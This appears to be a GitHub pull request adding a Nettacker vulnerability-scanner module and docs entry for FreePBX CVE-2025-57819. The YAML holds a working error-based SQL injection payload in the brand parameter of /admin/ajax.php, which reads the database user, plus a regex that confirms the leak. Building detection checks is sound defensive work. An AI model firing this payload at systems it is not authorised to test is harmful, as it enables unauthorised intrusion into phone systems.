Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions docs/Modules.md
Original file line number Diff line number Diff line change
Expand Up @@ -161,6 +161,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
- '**ProFTPd_integer_overflow_vuln**' - check ProFTPd for CVE-2011-1137
- '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
- '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
- '**sangoma_freepbx_cve_2025_57819_vuln**' - check target for CVE-2025-57819
Comment thread
sankalp-b1401 marked this conversation as resolved.
- '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
- '**smartermail_cve_2026_24423_vuln**' - check the target for SmarterMail CVE-2026-24423 vulnerability
- '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
Expand Down
50 changes: 50 additions & 0 deletions nettacker/modules/vuln/sangoma_freepbx_cve_2025_57819.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
info:
name: sangoma_freepbx_cve_2025_57819_vuln
author: Sankalp Bansal
severity: 9.8
description: >
CVE-2025-57819 is a critical vulnerability in FreePBX 15, 16, 17.
Improper sanitization in the brand parameter of the endpoint
module leads to SQLi and Remote Code Execution possibly leading
to root privileges.
reference:
- https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/
- https://nvd.nist.gov/vuln/detail/CVE-2025-57819
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819/blob/main/README.md
profiles:
- vuln
- http
- critical_severity
- cve
- cve_2025
- sangoma
- freepbx
- cisa_kev

payloads:
- library: http
steps:
- method: get
timeout: 3
headers:
User-Agent: "{user_agent}"
ssl: false
Comment thread
coderabbitai[bot] marked this conversation as resolved.
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x' AND EXTRACTVALUE(1,CONCAT('~USER:',(SELECT USER()),'~')) -- "
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
- "https"
ports:
- 80
- 443
response:
condition_type: and
conditions:
content:
regex: (?s)(?=.*XPATH syntax error.*~.*~)(?=.*utility\.functions\.php)(?=.*~USER:([^~]+)~)
reverse: false
Loading